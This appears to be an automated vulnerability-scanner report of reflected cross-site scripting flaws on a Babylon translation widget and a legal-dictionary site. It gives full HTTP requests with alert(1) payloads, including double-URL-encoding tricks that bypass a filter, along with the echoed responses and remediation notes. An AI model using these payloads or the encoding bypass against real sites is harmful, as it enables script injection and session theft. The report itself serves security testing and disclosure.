HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:18 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5429
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the bg_color request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d113"><script>alert(1)</script>e3507f2ee8a was submitted in the bg_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=8d113"><script>alert(1)</script>e3507f2ee8a&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5406
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the but request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d79"><script>alert(1)</script>8e268187563 was submitted in the but parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/458674d79"><script>alert(1)</script>8e268187563&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:20 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5416
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <t ...[SNIP]... <input type="image" value="Term" src="http://affiliates.babylon.com/42/4100/458674d79"><script>alert(1)</script>8e268187563" alt="Translate with Babylon" title="Translate with Babylon" onClick="document.transbox._pressed.value=this.value;"/> ...[SNIP]...
The value of the default_keyword request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 653c4'%3balert(1)//924551971a0 was submitted in the default_keyword parameter. This input was echoed as 653c4';alert(1)//924551971a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword=653c4'%3balert(1)//924551971a0 HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:20 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5486
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the default_keyword request parameter is copied into a JavaScript inline comment. The payload 17ce5*/alert(1)//d6464732f3f was submitted in the default_keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword=17ce5*/alert(1)//d6464732f3f HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:20 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5486
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the default_keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 455a7"><script>alert(1)</script>25696edc6af was submitted in the default_keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword=455a7"><script>alert(1)</script>25696edc6af HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:20 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5591
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the pic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f9c9"><script>alert(1)</script>3e7341fa6e6 was submitted in the pic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/45851f9c9"><script>alert(1)</script>3e7341fa6e6&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:18 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5416
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the sbut request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82995"><script>alert(1)</script>dbc362e9cd2 was submitted in the sbut parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/458782995"><script>alert(1)</script>dbc362e9cd2&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:20 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5416
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75d1"><script>alert(1)</script>2528e5bf299 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/e75d1"><script>alert(1)</script>2528e5bf299&x=12&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5416
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf12"><script>alert(1)</script>dd39dcf0820 was submitted in the x parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12daf12"><script>alert(1)</script>dd39dcf0820&y=70&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5416
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the y request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59270"><script>alert(1)</script>44cb7c9e98c was submitted in the y parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /trans_box/tbv2.php?lang=EN&affiliate=CD4100&pic=http://affiliates.babylon.com/42/4100/4585&url=http://affiliates.babylon.com/z/4585/CD4100/&x=12&y=7059270"><script>alert(1)</script>44cb7c9e98c&height=40&width=170&uri=&comma=EN,DE,ES,FR,HE,IT,JA,NL,PT,SR,ZHS,ZHT,KO,RU,SV,TR&bg_color=&but=http://affiliates.babylon.com/42/4100/4586&but_size=46&sbut_size=47&oldervar=0&showsearch=1&sbut=http://affiliates.babylon.com/42/4100/4587&default_keyword= HTTP/1.1 Host: online.babylon.com Proxy-Connection: keep-alive Referer: http://webcache.googleusercontent.com/search?q=cache:cyhBgjTvtJEJ:divorcelaw.legaldictionaries.org/Massachusetts-Divorce-Law-Dictionary/Abandonment+massachusetts+divorce+abandonment&cd=2&hl=en&ct=clnk&gl=us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 16:59:19 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5416
<!-- version server --><!--old var isnt set --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bdd2%253cscript%253ealert%25281%2529%253c%252fscript%253e87c1e8e9144 was submitted in the REST URL parameter 1. This input was echoed as 4bdd2<script>alert(1)</script>87c1e8e9144 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /European-Patent-Office-Glossary4bdd2%253cscript%253ealert%25281%2529%253c%252fscript%253e87c1e8e9144/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:51 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 23803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d21%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dfda9fcd91 was submitted in the REST URL parameter 1. This input was echoed as d3d21"><script>alert(1)</script>1dfda9fcd91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /European-Patent-Office-Glossaryd3d21%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dfda9fcd91/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:22 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24090
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 59c01%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2096a0e9c4 was submitted in the REST URL parameter 1. This input was echoed as 59c01</title><script>alert(1)</script>d2096a0e9c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /European-Patent-Office-Glossary59c01%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2096a0e9c4/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:32 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 24399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4a3b%2527%253balert%25281%2529%252f%252f375cd4034da was submitted in the REST URL parameter 1. This input was echoed as b4a3b';alert(1)//375cd4034da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /European-Patent-Office-Glossaryb4a3b%2527%253balert%25281%2529%252f%252f375cd4034da/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:34 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 22757
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... ').term.value; } if (document.myform.operation[2] && document.myform.operation[2].checked == true) { var loc = 'http://patentandtrademark.legaldictionaries.org/European-Patent-Office-Glossaryb4a3b';alert(1)//375cd4034da/' + document.getElementById('define').term.value; } } var myExp = /\s/g; var loc2 = loc.replace(myExp,"_"); location = loc2; }
function bar(e){ var keycode; if (window.event) keycod ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 284c6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ce4d3ad6fb was submitted in the REST URL parameter 1. This input was echoed as 284c6</title><script>alert(1)</script>0ce4d3ad6fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PATENTSCOPE-Glossary284c6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ce4d3ad6fb/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:16:31 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 23909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b99db%2527%253balert%25281%2529%252f%252f0b8c9f8737b was submitted in the REST URL parameter 1. This input was echoed as b99db';alert(1)//0b8c9f8737b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PATENTSCOPE-Glossaryb99db%2527%253balert%25281%2529%252f%252f0b8c9f8737b/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:34 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 22262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
...[SNIP]... yId('define').term.value; } if (document.myform.operation[2] && document.myform.operation[2].checked == true) { var loc = 'http://patentandtrademark.legaldictionaries.org/PATENTSCOPE-Glossaryb99db';alert(1)//0b8c9f8737b/' + document.getElementById('define').term.value; } } var myExp = /\s/g; var loc2 = loc.replace(myExp,"_"); location = loc2; }
function bar(e){ var keycode; if (window.event) keycod ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb0f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e659778ceb89 was submitted in the REST URL parameter 1. This input was echoed as eb0f3"><script>alert(1)</script>659778ceb89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /PATENTSCOPE-Glossaryeb0f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e659778ceb89/ HTTP/1.1 Host: patentandtrademark.legaldictionaries.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 29 Nov 2010 17:15:23 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 23595
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ac9f%253cscript%253ealert%25281%2529%253c%252fscript%253eb032d614600 was submitted in the REST URL parameter 1. This input was echoed as 1ac9f<script>alert(1)</script>b032d614600 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
